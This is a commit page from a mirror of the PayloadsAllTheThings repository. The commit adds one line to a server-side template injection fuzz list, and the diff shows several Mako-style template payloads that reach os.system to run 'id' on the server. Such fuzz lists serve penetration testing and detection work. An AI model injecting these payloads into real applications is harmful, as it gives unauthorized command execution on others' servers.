mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update ssti.fuzz
This commit is contained in:
parent
21318a12cd
commit
bdab385cfb
1 changed files with 1 additions and 0 deletions
|
@ -54,3 +54,4 @@ ${self.__init__.__globals__['util'].os.system('id')}
|
|||
${self.template.module.runtime.util.os.system("id")}
|
||||
${self.module.filters.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.exceptions.util.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue